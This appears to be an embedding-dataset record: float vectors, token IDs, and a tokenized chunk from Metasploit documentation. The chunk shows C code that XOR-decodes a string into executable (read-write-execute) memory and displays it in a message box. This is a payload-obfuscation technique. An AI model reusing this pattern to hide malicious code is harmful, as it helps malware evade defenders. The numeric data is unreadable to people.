0.0947326049208641, 0.27241289615631104, -0.4309447705745697, -0.4835564196109772, -0.5306205153465271, 0.7001039385795593, 0.2994793653488159, 0.0704074427485466, 0.30154767632484436, -0.7234312891960144, -0.8879038691520691, 0.7309350371360779, 0.8132719397544861, -0.6063901782035828, 0.256616473197937, -0.1435360461473465, 0.4286549985408783, 0.6859538555145264, 0.19700519740581512, -0.18951839208602905, -0.18720948696136475, -0.915296733379364, -1.3832794427871704, 0.589606761932373, -0.06487396359443665, -0.3734142780303955, -0.6922001242637634, -0.3018055558204651, 0.3050723075866699, -0.8065833449363708, -0.3669798672199249, -0.2176235169172287, -0.3891791105270386, 0.04588562622666359, 0.3263512849807739, 0.13074137270450592, -0.4423750042915344, 0.31729549169540405, 0.3274179697036743, 0.36560526490211487, 0.1603022664785385, -0.3547821342945099, -0.025554420426487923, 0.144145667552948, 0.3477232754230499, 0.43320414423942566, 0.7065481543540955, -0.6981675624847412, 0.03481481596827507, -0.5019739270210266, -0.011279352009296417, -0.28764691948890686, 0.1366949826478958, 0.5885024070739746, -0.2793322801589966, 0.3738599419593811, 0.2861878275871277, 0.4840887486934662, -0.10301924496889114, 1.028152346611023, 0.3043080270290375, -0.31751593947410583, -0.35726839303970337, 0.06373459845781326, 0.5397858619689941, -0.6566371321678162, -0.1993737667798996, 0.2863689064979553, -0.8543640375137329, 1.0640329122543335, 0.0770372524857521, 0.7255451679229736, -0.0022694114595651627, -0.6776260733604431, -0.15203219652175903, 0.4863682985305786, 0.09064061939716339, 0.5965147018432617, -1.042332410812378, -0.04200684651732445, 0.01521237101405859, -0.1156003549695015, -1.1295865774154663, 0.3221290707588196, -0.3659761846065521, -0.4744102656841278, 0.6888694763183594, 0.2750072181224823, 0.2191915661096573, -0.5918751955032349, -0.41715624928474426, 0.6158661246299744, -0.13732191920280457, 0.29722052812576294, -0.8536581993103027, -0.24955101311206818, -0.15810620784759521, -0.38603684306144714, -0.8556463718414307, -0.08029621094465256, -0.2238764464855194, 0.7177824378013611, 0.14783400297164917, 0.6749289631843567, 0.0014965160517022014, -0.9083610773086548, 0.2126644104719162, 0.4221346080303192, 0.6898252964019775, -1.1404311656951904, 0.45987117290496826, 0.33417168259620667, 0.08643605560064316, 0.9103602766990662, 0.6099412441253662, -0.9158487319946289, -0.08966152369976044, -0.5750972032546997, 0.27309316396713257, -0.5573728680610657, -0.46037107706069946, -0.6394928097724915, -0.5852991342544556, -0.8281732201576233, 0.216654434800148, 0.3667744994163513, -0.8817620873451233, -0.006640545092523098, -0.6869710683822632, 0.19028669595718384, -0.505545973777771, 0.13616697490215302, -0.6191588044166565, -0.3758380711078644, 0.15800322592258453, 1.0517901182174683, -0.3473823666572571, 0.13976973295211792, -0.4284934103488922, 0.4699023365974426, -0.031024493277072906, 0.30450117588043213, -0.6114743947982788, -0.530129075050354, 0.404675155878067, 0.8130195736885071, -0.07513604313135147, 0.34503522515296936, -0.8476970791816711, 0.3398720920085907, -0.016167931258678436, 0.4115677773952484, -0.3788336217403412, -0.10830647498369217, -0.8616208434104919, 0.2953271269798279, 0.18199129402637482, -0.2550966143608093, -0.07726890593767166, 0.13679182529449463, -0.2939509451389313, 0.007177594117820263, -0.03922809287905693, 0.1074485257267952, -0.5760098695755005, -0.5211654305458069, -0.5708044767379761, 0.22770994901657104, -0.17479711771011353, -0.41342467069625854, 0.5293716192245483, -0.847608208656311, 0.7408828735351562, -0.4984532296657562, 0.48575741052627563, 1.3137049674987793, -0.22948801517486572, -0.051846422255039215, -1.4864903688430786, 1.0905535221099854, 0.5629844665527344, -0.011944298632442951, -0.5525779128074646, -0.20800888538360596, -0.5724478960037231, -0.07713759690523148, -0.1116902232170105, -0.21265186369419098, -0.19131489098072052, 0.10284765809774399, 0.3690306544303894, -0.35938018560409546, 0.8617522716522217, -0.7479564547538757, -0.6311137676239014, -0.15254567563533783, 0.7153576612472534, -0.05496671423316002, 0.41079095005989075, 0.24416379630565643, 0.4785282015800476, -0.466094970703125, -0.32090166211128235, -0.41882750391960144, -0.01894170045852661, -0.6655742526054382, 0.6532905101776123, 0.13831594586372375, -0.6692126989364624, 0.6902063488960266, -0.10316984355449677, -0.34696897864341736, -0.5424606204032898, -0.3070627450942993, -0.2939561605453491, -0.8509993553161621, -0.4338248074054718, -0.2769589126110077, 0.04785995930433273, -0.21541161835193634, -0.33333611488342285, 0.1386912763118744, 0.16995324194431305, -0.13125891983509064, -0.8038082718849182, 0.24779048562049866, 0.04704109951853752, 0.10080689191818237, 0.492878258228302, 0.00439976342022419, 0.32179686427116394, -1.4374445676803589, -0.3938854932785034, -0.10356075316667557, 0.5386184453964233, 0.037401095032691956, -0.11861411482095718, -0.09122979640960693, 0.2866385579109192, 0.3135213553905487, 1.336858868598938, -0.2123854160308838, 0.7113132476806641, 0.6582769155502319, -0.33334651589393616, -0.944935142993927, -0.3943437933921814, -0.09676723927259445, -0.5273828506469727, 0.3345629572868347, -0.0263826884329319, 0.1064363345503807, 0.5553467273712158, -0.2354874312877655, 0.21761947870254517, -0.9500043988227844, 0.11287453025579453, -1.0141228437423706, -0.08631180971860886, -0.14337557554244995, 0.07193456590175629, -0.08135879784822464, -0.0660916417837143, -0.3857101500034332, -0.5352287888526917, -1.1302838325500488, 0.0941188707947731, -0.07489441335201263, -0.6873010993003845, 0.10188742727041245, 0.4337572455406189, -1.0653409957885742, -0.09659481793642044, -0.7434626221656799, -0.23822493851184845, 0.2385915070772171, 0.05209719389677048, 0.17520441114902496, -0.27370405197143555, 0.09602034091949463, 0.479384183883667, -0.3588443398475647, 0.32531026005744934, 0.10511831939220428, 0.013846148736774921, -0.5143716931343079, 0.11809941381216049, -0.4587045907974243, 0.03240447863936424, 0.7187338471412659, 0.13499915599822998, 1.0187585353851318, -0.3790569007396698, -0.3431008458137512, -0.11723595857620239, 0.17414169013500214, 0.9059564471244812, -0.11640386283397675, -0.7992515563964844, -0.15029090642929077, 0.11092424392700195, -0.9003018140792847, 0.02419772744178772, -0.4535176753997803, 0.15595176815986633, 0.5506362915039062, 0.30556952953338623, 0.07490505278110504, 0.1917358934879303, 0.5785173773765564, -0.6499572992324829, -0.2435070425271988, 0.3880364000797272, 0.29010728001594543, -0.4529956877231598, -0.6943411827087402, -0.10257497429847717, 0.2396237701177597, 0.44235050678253174, 0.033495791256427765, 0.24369008839130402, -0.3556698262691498, 0.02938520908355713, -0.47028258442878723, -0.2022288739681244, -0.5310773253440857, -0.4962940812110901, -0.3232070505619049, -0.05683855712413788, 0.4145317077636719, 0.7462352514266968, 0.24627594649791718, -0.2734082043170929, -0.5356155037879944, 0.4954575002193451, -0.9591348767280579, -0.06720203906297684, -0.035800181329250336, -0.6862208247184753, 0.1546751707792282, -0.7058826684951782, -0.0417206808924675, -0.052981216460466385, -0.02939704619348049, -0.2327364683151245, -0.1569271683692932, 0.0623188391327858, 0.6133591532707214, 1.4778238534927368, -0.6383669376373291, -0.31393659114837646, 0.035739749670028687, 0.4241597652435303, -0.6448060870170593, -0.9566044211387634, -0.3086877465248108, 0.9963688850402832, 0.5969994068145752, 0.5644785165786743, -1.13367760181427, -0.48541322350502014, 0.5106300115585327, 0.20379416644573212, -0.688011884689331, -0.1952562928199768, 0.3443029522895813, 0.2969113886356354, -0.8532926440238953, 0.04358367249369621, 0.060403332114219666, -0.09099072962999344, 0.31221920251846313, -0.11668989807367325, -0.9559662342071533, -0.046786531805992126, 0.016320835798978806, -0.8492349982261658, 0.8175883293151855, 0.24551039934158325, -0.0428534634411335, -0.32244694232940674, -0.2842618525028229, -0.0651860311627388, 0.8034913539886475, 0.7658556699752808, 0.5334503054618835, -0.1181899905204773, 0.673095166683197, 0.2551862895488739, -0.8128989338874817, -0.25868919491767883, 0.43224385380744934, -0.24731141328811646, -0.47726666927337646, 1.053585171699524, -0.3147348165512085, -0.2831639349460602, -0.23876580595970154, -0.19592297077178955, 0.18645130097866058, 0.205053448677063, 0.06157706305384636, -0.43127161264419556, -0.4125642776489258, 0.7605307102203369, -0.14793382585048676, 0.06044485419988632, 0.35790640115737915, -0.46543368697166443, 0.3016604781150818, 0.305183082818985, -0.054395634680986404, -0.31153735518455505, 1.0979413986206055, 0.6020219326019287, 0.2972925305366516, 0.5175437927246094, 0.44011905789375305, 0.002509136451408267, -0.565283477306366, 0.6918652653694153, 0.06015067175030708, 0.13192281126976013, -0.06336242705583572, 0.040651172399520874, -0.3847803771495819, 0.06487135589122772, -0.26576557755470276, 0.5249362587928772, 0.21125952899456024, -0.3666608929634094, 0.4356728196144104, -0.7844502925872803, -0.47655609250068665, -0.49584484100341797, -0.168333500623703, 0.32685980200767517, -0.31372612714767456, 0.013537142425775528, 0.7333260178565979, 0.30465802550315857, 0.5728815197944641, -0.3437894284725189, 0.3184208571910858, 0.7760998010635376, 0.5329127907752991, 0.45454707741737366, -0.28454139828681946, -0.2571357190608978, 0.4606170654296875, -0.5362390279769897, 0.1649201512336731, 0.5953871607780457, 0.08720816671848297, 0.12930618226528168, -0.20296944677829742, 0.16877159476280212, -0.22815373539924622, 0.7732706069946289, 0.15413270890712738, -0.3057664632797241, 0.7204946279525757, -0.012435032054781914, -0.26518839597702026, 0.46793419122695923, 1.4425283670425415, 0.32885870337486267, 0.20302271842956543, -0.3501890003681183, 0.10894075036048889, -1.0119293928146362, -0.09291445463895798, -0.06833110749721527, 0.1691792756319046, -0.30875763297080994, -0.32810837030410767, -0.3259519040584564, -0.8686327338218689, -0.3581426441669464, 0.08825861662626266, -0.3713148236274719, -0.19746991991996765, 0.8992735743522644, 0.6176000237464905, 0.6991608142852783, -0.3933657109737396, -0.3402533531188965, -0.19587557017803192, -0.14390501379966736, 0.7435042858123779, 0.045474112033843994, 0.44776883721351624, 0.06965124607086182, 0.8424047231674194, 0.12776540219783783, -0.4289877712726593, -0.29643377661705017, -0.08233316242694855, 0.32047033309936523, 0.028333531692624092, -0.803561806678772, -1.137198805809021, -0.2728305459022522, -0.19009441137313843, 0.6352785229682922, 0.30858322978019714, -0.14385704696178436, -0.33825358748435974, -0.5579202175140381, -0.580214262008667, -0.38278061151504517, -0.8607339859008789, 0.12693478167057037, -0.6004488468170166, -0.03074098378419876, -0.12362676113843918, -0.6394087672233582, 4.405730247497559, 0.8146125078201294, 0.8101471066474915, 0.5100124478340149, 0.6647810935974121, 1.3955212831497192, 0.5875765085220337, 0.06704406440258026, 0.2667884826660156, -0.39357173442840576, 0.6533190011978149, -0.11562831699848175, 0.5138902068138123, 0.2131456881761551, -0.24479463696479797, 0.41148990392684937, -0.21550458669662476, 0.2732100784778595, 0.456284761428833, -0.9798277020454407, -0.4621405303478241, -0.26615726947784424, -0.3452342748641968, 0.9899596571922302, -0.06028208136558533, -0.4100039303302765, 0.6289844512939453, -0.48507869243621826, -0.038938090205192566, -0.43497854471206665, -0.316252738237381, -0.21740677952766418, 0.4964171051979065, -0.4522958993911743, -0.36234936118125916, 0.1829773485660553, 0.12918433547019958, -0.7719419598579407, 0.19781887531280518, -0.11114425957202911, 0.3755275309085846, 0.16228508949279785, -0.2449244260787964, 0.01889219880104065, 0.23102129995822906, 0.34575507044792175, -0.595710039138794, -0.30801141262054443, 1.1740466356277466, -0.16841010749340057, 0.40667954087257385, 0.01084121409803629, 0.3392852246761322, -0.017701314762234688, -0.17294900119304657, 0.3902600109577179, -0.5142025351524353, 0.2052067071199417, 0.13384906947612762, -0.42427200078964233, 0.2500319480895996, 0.22507759928703308, -0.20901349186897278, -0.15643715858459473, -0.3617093861103058, 1.0469541549682617, -0.014904741197824478, 0.10228723287582397, 0.031347934156656265, -0.7336298823356628, 0.21417005360126495, 0.11199615150690079, -0.9710447192192078, -0.46165427565574646, -0.24788306653499603, -0.1955905258655548, 0.014030473306775093, 0.26061102747917175, 0.1887192726135254, -0.0068899355828762054, -0.14898158609867096, 0.20806263387203217, -0.5942354202270508, -0.2215861976146698, -0.21025875210762024, -0.11029883474111557, -0.294232040643692, -0.3814637064933777, -0.6002777218818665, 0.2688468098640442, 0.15268008410930634, 1.0246975421905518, -0.481779545545578, -0.33235791325569153, 0.3660339117050171 ]
[ 1012, 13138, 1012, 2410, 2663, 10867, 1024, 1024, 1054, 15006, 2102, 18442, 1027, 5887, 2509, 1012, 9703, 1012, 2334, 5884, 1027, 9703, 1012, 2334, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 1056, 13512, 1011, 3433, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 5354, 27531, 1011, 1056, 13512, 10210, 13675, 14728, 19909, 17053, 7281, 5552, 2000, 1013, 5198, 1013, 5310, 1013, 1012, 5796, 2546, 2549, 1013, 8840, 4140, 1013, 16798, 14142, 14526, 2620, 12521, 2692, 16086, 2549, 1035, 12398, 1035, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1035, 10210, 1012, 17710, 20473, 2891, 1012, 10507, 2050, 1035, 28161, 2581, 21619, 1012, 8026, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 1056, 5620, 1011, 3433, 1031, 1008, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 5354, 27531, 1011, 1056, 5620, 10210, 13675, 14728, 19909, 17053, 7281, 5552, 2000, 1013, 5198, 1013, 5310, 1013, 1012, 5796, 2546, 2549, 1013, 8840, 4140, 1013, 16798, 14142, 14526, 2620, 12521, 2692, 16086, 2549, 1035, 12398, 1035, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1035, 10210, 1012, 17710, 20473, 2891, 1012, 10507, 2050, 1035, 6070, 2683, 27009, 2575, 1012, 8026, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 1037, 9398, 10656, 1056, 5620, 1011, 3433, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 6070, 1011, 2363, 9706, 1011, 2128, 4160, 1012, 14817, 2075, 5219, 3145, 1012, 1012, 1012, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 5354, 27531, 1011, 8833, 2378, 3144, 1024, 9703, 1012, 2334, 1032, 8911, 1024, 1052, 2549, 1002, 1002, 1059, 2692, 4103, 1031, 1008, 1033, 3094, 5806, 5219, 1015, 2441, 1006, 17613, 1012, 16923, 1012, 13138, 1012, 1015, 1024, 2753, 2581, 19317, 1011, 1028, 17613, 1012, 16923, 1012, 13138, 1012, 2410, 1024, 5354, 27531, 1007, 2012, 16798, 2509, 1011, 5890, 1011, 2324, 2260, 1024, 5757, 1024, 5709, 1009, 2199, 2692, 1031, 1008, 1033, 11728, 1015, 1997, 1015, 6184, 1006, 2531, 1003, 3143, 1007, 1031, 1008, 1033, 9830, 11336, 7781, 2949, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 1007, 1028, 6521, 1011, 1045, 1011, 1015, 1031, 1008, 1033, 3225, 8290, 2007, 1015, 1012, 1012, 1012, 7513, 3645, 1031, 2544, 2184, 1012, 1014, 1012, 16065, 2683, 2509, 1033, 1006, 1039, 1007, 2355, 7513, 3840, 1012, 2035, 2916, 9235, 1012, 1039, 1024, 1032, 5198, 1032, 8911, 1028, 102 ]
metasploit
13.txt
2
[CLS] how to xor with metasploit : : framework : : compilerthe metasploit c compiler has built - in support for xor encoding and decoding, which is implemented as the xor. h header. code example # include < windows. h > # include < string. h > # include < xor. h > int main ( int args, char * * argv ) { char * xorstr = " nnnn " ; char xorkey = 0x0f ; lpvoid lpbuf = virtualalloc ( null, sizeof ( int ) * strlen ( xorstr ), mem _ commit, page _ execute _ readwrite ) ; memset ( lpbuf,'\ 0 ', strlen ( xorstr ) ) ; xor ( ( char * ) lpbuf, xorstr, xorkey, strlen ( xorstr ) ) ; messagebox ( null, lpbuf, " test ", mb _ ok ) ; return 0 ; } to compile, use metasploit : : framework : : compiler : : windows. compile _ c [SEP]
[ 0.10861212760210037, -0.6799750328063965, 0.18310126662254333, -0.23070180416107178, -0.16165298223495483, -0.9124234914779663, -0.024249175563454628, 0.28505587577819824, -0.21695822477340698, 0.9000771641731262, 0.5110820531845093, 0.025906505063176155, -0.15081436932086945, -0.5696221590042114, -0.2917194962501526, 0.1911289244890213, 0.33489322662353516, -0.1935664713382721, -0.5853873491287231, 0.832248866558075, 0.0340828113257885, -0.4219686985015869, -1.6256952285766602, 0.28207895159721375, -0.5296337604522705, -0.023976484313607216, 0.32831138372421265, -0.09217590093612671, 1.2261626720428467, 0.9336390495300293, 0.026890164241194725, 0.05131061002612114, 0.9728339910507202, -0.776113748550415, -0.14138534665107727, -0.1411612629890442, 0.5512734055519104, -0.16487450897693634, -0.14262886345386505, -0.36383119225502014, 0.07619958370923996, 0.02243620902299881, 0.10181144624948502, -1.247619390487671, -0.8488190770149231, -0.6754536628723145, -0.012124394066631794, 0.11155100911855698, 0.43235114216804504, 0.1359630823135376, -0.12646503746509552, 0.542693018913269, 0.5085237622261047, -0.6517162919044495, -0.008711323142051697, -0.03187698870897293, -0.06462082266807556, 0.6780579090118408, -0.2299773246049881, 0.04665732383728027, -0.24681763350963593, -0.3931920528411865, -0.5584416389465332, -0.8108301162719727, 0.22128011286258698, -0.09199409931898117, -0.40461966395378113, 0.4206315875053406, -0.005597224924713373, -0.18469509482383728, -0.021389272063970566, 0.4590105414390564, -0.5591829419136047, -0.6529722809791565, 0.11046605557203293, -0.01751226931810379, 0.3983437418937683, 0.280838280916214, -0.9408541917800903, 0.7700825333595276, -0.26343056559562683, 0.5311794281005859, 0.11149199306964874, -0.5120407342910767, -0.11952005326747894, -0.8425182700157166, 0.2885870039463043, -0.7775281071662903, -0.9170243144035339, -0.9493287801742554, 0.29281118512153625, 0.31213057041168213, 0.3050495386123657, 0.6699467301368713, 0.34049710631370544, 0.4800804853439331, 0.4186358153820038, 0.25294992327690125, -0.636929988861084, 0.18729236721992493, 0.41574805974960327, 0.5257502794265747, -0.5451740622520447, 0.3469439744949341, 0.5693652629852295, -0.025823310017585754, 0.3386923670768738, 0.5924411416053772, -0.4787384569644928, -0.4538111090660095, 0.3995823264122009, 0.016850806772708893, -0.20065854489803314, 0.1311143934726715, 0.13618934154510498, 0.3193013072013855, -0.07458378374576569, 0.4372291564941406, 0.16833755373954773, -0.47653263807296753, 0.2892950773239136, -0.2961963415145874, -0.032824624329805374, 0.15054930746555328, -0.46399301290512085, -0.2805830240249634, 0.12210740894079208, 0.4402462840080261, -0.8342549204826355, 0.12526482343673706, -0.03511432185769081, 0.1647760272026062, 0.2707373797893524, 0.49280017614364624, -0.02571188285946846, 0.7588034868240356, 0.1954493671655655, -0.007814999669790268, 1.0271553993225098, 0.1978515386581421, 0.6399134397506714, -0.4352768361568451, 0.4426577389240265, 1.3404699563980103, 0.2649240791797638, 0.12589232623577118, 0.07223875820636749, 0.04748188331723213, -0.3723927438259125, -0.07008747011423111, -0.18108779191970825, -0.4694581925868988, 0.12761779129505157, 0.2762913107872009, 0.6374810934066772, 0.3194670081138611, -0.32285600900650024, 0.7811886668205261, 0.047785818576812744, 0.11139056086540222, 0.0711047425866127, 0.12059111893177032, -0.3022836148738861, -0.09884186089038849, -0.30572789907455444, -0.05445751175284386, -0.9435169100761414, -0.23686791956424713, -0.8982784152030945, -0.44550320506095886, 1.028091311454773, -0.3655586540699005, -0.06519444286823273, 0.1686820089817047, 1.083544373512268, 0.5513395667076111, -0.38312864303588867, -0.017596308141946793, 0.07349098473787308, 0.3505750596523285, 0.10706882923841476, 0.8799115419387817, -0.2313224822282791, 1.3787027597427368, 0.09939360618591309, -0.1210518330335617, 0.3497152030467987, 0.03531733527779579, -0.8112532496452332, -0.19440072774887085, 0.3346054255962372, 0.351277619600296, -0.020640065893530846, 0.3751813769340515, -0.29725342988967896, 0.32939067482948303, -1.1592692136764526, -0.052691005170345306, -0.6403494477272034, -0.029530072584748268, -0.580049991607666, 0.5077195167541504, -0.37231361865997314, 0.15382492542266846, -0.8139954805374146, -0.7049759030342102, 0.7174577116966248, 0.673500120639801, -0.37480539083480835, -0.013795766979455948, 0.5882335305213928, -0.24639281630516052, -0.3177359104156494, 0.4189651906490326, 0.955803394317627, 0.07236349582672119, -0.8532899022102356, -0.17755834758281708, 0.2007932811975479, 0.6850452423095703, -0.47025564312934875, 0.9262933135032654, 0.3587544858455658, 0.06756213307380676, -0.8632386326789856, -0.8225452899932861, 0.8217649459838867, 0.6690059304237366, 0.3580290973186493, 0.8887761831283569, 0.29273462295532227, -0.10087762773036957, 0.02434067241847515, 0.8692463040351868, 0.5704322457313538, 0.03085225075483322, 0.9880082011222839, 1.087291955947876, 0.04646608233451843, -0.061458129435777664, -0.07959301769733429, 0.17262564599514008, -1.030702829360962, 0.06331495195627213, 0.8391773700714111, 0.012248588725924492, 0.3041101098060608, -0.2445460557937622, -0.16765649616718292, -0.6003305315971375, -0.13860805332660675, 1.0310642719268799, 0.3550301194190979, 0.2154187560081482, -1.2645107507705688, -0.4849731922149658, 0.24917566776275635, 0.37636053562164307, -1.3464726209640503, 0.18392956256866455, 0.701187014579773, 0.2131277620792389, -0.3784632086753845, -0.2515126168727875, 0.2588752508163452, 0.6431002616882324, 1.1224088668823242, -0.375342458486557, -0.22962340712547302, -0.8343139290809631, -0.6932673454284668, -0.4685373902320862, -0.47128620743751526, 0.08810033649206161, -0.4956648647785187, -0.03379083424806595, 0.0932687297463417, -0.3842768669128418, -0.4079098701477051, -0.7551963925361633, 0.7291839122772217, -0.009813450276851654, -0.259929358959198, 0.2891289293766022, 0.566762387752533, -0.9133574366569519, 0.090196393430233, -0.09644065797328949, 0.07337592542171478, 0.5712080597877502, -0.43895381689071655, 0.5795597434043884, 0.21548284590244293, -0.17021293938159943, 0.13558492064476013, -1.0809351205825806, 0.05256674438714981, -0.08881248533725739, -0.17470219731330872, 0.18587586283683777, -0.7517596483230591, -0.14773975312709808, 0.6279802918434143, 0.06807058304548264, -0.17984986305236816, 0.7982048988342285, 0.5324128270149231, -0.4183422029018402, 0.3929442763328552, 0.7961941957473755, -1.046302080154419, 1.0144330263137817, 0.41065713763237, 0.16943922638893127, -0.27669987082481384, 1.2598183155059814, 0.21755971014499664, 0.1885715276002884, -0.30065029859542847, -0.2658255994319916, -0.45226961374282837, 0.21074189245700836, -0.33497804403305054, -0.3383767008781433, -0.8125365376472473, 1.2411688566207886, 0.09984218329191208, -0.49034813046455383, -0.14583837985992432, -0.45050308108329773, -0.4104630947113037, 0.7650057673454285, -0.1352653056383133, 1.1481951475143433, -0.22612199187278748, 1.0239464044570923, -0.3373118042945862, 0.4283284544944763, -0.03591645136475563, -0.0059414878487586975, -0.5728542804718018, -0.424599289894104, 0.7215975522994995, -0.0996820256114006, -0.2606815993785858, -0.38353511691093445, 0.3330284059047699, 0.159666046500206, -0.19357936084270477, -0.8587878346443176, 0.27698808908462524, -0.08684449642896652, -0.21005897223949432, 0.15648464858531952, 0.41691842675209045, 0.8922864198684692, -0.9985854029655457, -0.10652892291545868, 0.19685517251491547, -0.10907062143087387, 0.40102100372314453, -0.14228445291519165, -0.8935586810112, 0.013087752275168896, -0.09810163825750351, -0.6669891476631165, -0.28714457154273987, 1.7950509786605835, -0.16572631895542145, -0.2455160915851593, 1.0578436851501465, -0.25524038076400757, -0.6812611222267151, 0.9291040301322937, -0.05917000025510788, -0.2640477120876312, 1.0722137689590454, -0.16294728219509125, 0.4076438844203949, -1.2413966655731201, 0.048251595348119736, 0.517998218536377, 0.13872255384922028, 0.02806469239294529, 0.4952298402786255, -0.0893140658736229, -0.7624714970588684, -0.6296581625938416, -1.0593851804733276, 0.297097772359848, -0.5931347012519836, -0.7654991745948792, 0.4081333875656128, -1.2806764841079712, -0.9800522923469543, -0.4688309133052826, 0.7489615082740784, 0.6331225633621216, 0.23677976429462433, 0.3104567229747772, 0.3836945593357086, 0.0880991742014885, 0.28574684262275696, 0.6865987777709961, -0.37601128220558167, 0.5135985016822815, 0.15478675067424774, 0.8253788948059082, -0.13272050023078918, 0.7058899402618408, -0.9844627380371094, 0.2571287751197815, -0.15043115615844727, 0.22422096133232117, -0.3198625445365906, 0.462166428565979, -0.4538281559944153, 0.1488424390554428, 0.8454311490058899, 0.07604482769966125, -0.5489405989646912, -0.5339757800102234, -0.12352833151817322, 0.14934438467025757, 0.6612321734428406, -0.23639464378356934, 0.012216201983392239, 0.18832895159721375, -0.6291897892951965, 0.057677414268255234, 0.023570263758301735, 0.12203840911388397, -0.599246084690094, -0.8200591206550598, -0.678705632686615, 1.0049962997436523, 0.6466516852378845, 0.07865364104509354, 0.18156294524669647, -0.6632094383239746, 0.14043670892715454, -0.6595255136489868, -0.01279147993773222, 0.030474325641989708, 0.017626626417040825, 0.032047342509031296, 0.5626307129859924, -0.013204272836446762, 0.17195208370685577, 0.288918673992157, 0.7025148868560791, -0.6925091743469238, -0.2976759672164917, -0.6537380218505859, 0.6211614608764648, 0.11276378482580185, 0.27542418241500854, -0.34112656116485596, 0.04675415903329849, -0.26054778695106506, -0.09116455912590027, -0.5140632390975952, 0.29093995690345764, -1.0986312627792358, -0.22598454356193542, 0.36011436581611633, -0.09615423530340195, 0.2075813114643097, 1.3680981397628784, -0.21723796427249908, -0.6612929701805115, 0.09094563126564026, 0.6381378173828125, -0.36946481466293335, -0.004515477456152439, -0.4769577980041504, 0.6820083856582642, 0.036039963364601135, -0.20553980767726898, -0.050783880054950714, -0.5097874402999878, 1.1190842390060425, 0.3831712603569031, -0.392773300409317, -0.01293347030878067, -0.7219775915145874, 0.5997416973114014, 0.09584204107522964, 0.15844833850860596, -0.2632159888744354, -0.23851336538791656, -0.2815232574939728, 0.1551724225282669, -0.05165516957640648, -0.3903162181377411, -0.4981786906719208, 0.3788582682609558, -0.5956178307533264, 0.7339381575584412, 0.5566244125366211, 0.6065203547477722, 0.24430391192436218, -0.5237287282943726, -0.4059201180934906, -0.5570300221443176, 0.18453305959701538, -0.175509512424469, 0.10627757757902145, -0.39692994952201843, -0.24384300410747528, -1.1986207962036133, 0.2761479914188385, -1.027114748954773, 0.07516692578792572, 0.6391835808753967, 0.29858678579330444, 0.14102593064308167, -0.44995352625846863, -0.49531036615371704, 0.41209858655929565, 0.3526720106601715, -0.992102324962616, -0.018546702340245247, -0.05104034021496773, -0.2100350558757782, 0.5635893940925598, 0.24483977258205414, -0.6092641949653625, -0.8417208194732666, 0.10211876779794693, 0.3632969558238983, -0.21960178017616272, -0.8699500560760498, -0.9186668992042542, -1.1932793855667114, -0.08527591824531555, 1.0076465606689453, -0.13607513904571533, -1.6124260425567627, -0.273794949054718, -0.2168954312801361, 0.1129668578505516, -0.4289138913154602, -0.34441810846328735, 0.04724371060729027, -0.3871191143989563, 0.38411691784858704, 1.053661823272705, -0.29038217663764954, 0.06549809128046036, -0.3641919195652008, 0.39723894000053406, 0.41544997692108154, 0.9693140983581543, -0.5063589215278625, -0.13687941431999207, 0.3272673189640045, 0.0210721418261528, -0.35044026374816895, 0.7767159342765808, -0.9745427370071411, 0.47088515758514404, 0.12130309641361237, 0.7946624755859375, -0.9894165992736816, -0.2825368642807007, -0.7820662260055542, 0.8606564998626709, 0.720237672328949, -0.5950722694396973, 0.23180438578128815, -0.12163085490465164, -0.11043000221252441, -0.017395533621311188, 0.16137966513633728, 0.5248285531997681, 0.169167622923851, -0.7128627300262451, -0.9336889982223511, 0.6954924464225769, 0.6800986528396606, 0.038666486740112305, 0.24603530764579773, -0.3873322010040283, 0.8233691453933716, -1.046133041381836, 0.33830732107162476, 0.9695524573326111, 0.1991308182477951, -0.0744442343711853, -0.010024748742580414, 0.4478728473186493, 0.5218172669410706, -0.35493025183677673, 0.19309908151626587, 0.1872367113828659, 0.17864693701267242, -0.3420344293117523, -0.8331992626190186, -0.6300024390220642, -0.0843176394701004, 0.035322435200214386, 0.8252272009849548, -1.0576086044311523, 0.28364309668540955, 0.08603855222463608, -0.5513871908187866, -0.22101463377475739, 0.29537662863731384, -0.5789867043495178, 0.5355934500694275, 0.5143294930458069, 0.7224977016448975, 0.6908126473426819, 0.35685572028160095, -0.3658972680568695, -0.5723040699958801, -0.5872712731361389, 1.1149808168411255, 0.35438311100006104, -0.24663153290748596, 0.6424782276153564, 0.026247678324580193, -0.5350633859634399, -0.3216472268104553, -1.2591458559036255, 0.23232707381248474, -0.5759989023208618, -0.3569115400314331, -0.64706951379776, -0.3500928282737732, -0.03152079880237579, -0.23282350599765778, -0.4429298937320709, -0.12554189562797546, 0.32909783720970154, 0.07690408080816269, 0.2941092848777771, -0.2986730933189392, 0.5034126043319702, 1.038800835609436, -0.0223910640925169, 0.05072551593184471, 0.12767259776592255, 0.7160164713859558, -0.031946275383234024, 0.9621906280517578, 0.2785421907901764, 0.6004989147186279, 1.12743079662323, 0.17348867654800415, -0.24242694675922394, 1.286694884300232, -0.6786724328994751, 0.5355290770530701, 0.20732444524765015, -0.9188656210899353, -0.671670138835907, 0.08565302193164825, -0.41537559032440186, -0.23723642528057098, 0.7467299103736877, -0.23006398975849152, 0.2183692306280136, 0.5332119464874268, -0.025116605684161186, -0.5225232243537903, -0.4262019395828247, 1.0597225427627563, -1.0521206855773926, -0.7740383148193359, -0.6630708575248718, -0.5623235106468201, 0.06398610025644302, -0.30767500400543213, -0.9391406774520874, -0.6248341202735901, -0.7624726891517639, -0.6358287334442139, -0.2456192970275879, 0.007810355629771948, -0.3577502965927124, -0.2829876244068146, -1.117457389831543, -0.4085213541984558, -0.24461887776851654, -0.021479859948158264, -0.679557740688324, -0.8727006316184998, -0.16067473590373993, -0.5774166584014893, -0.0966840535402298, 0.28348252177238464, -0.8032430410385132, 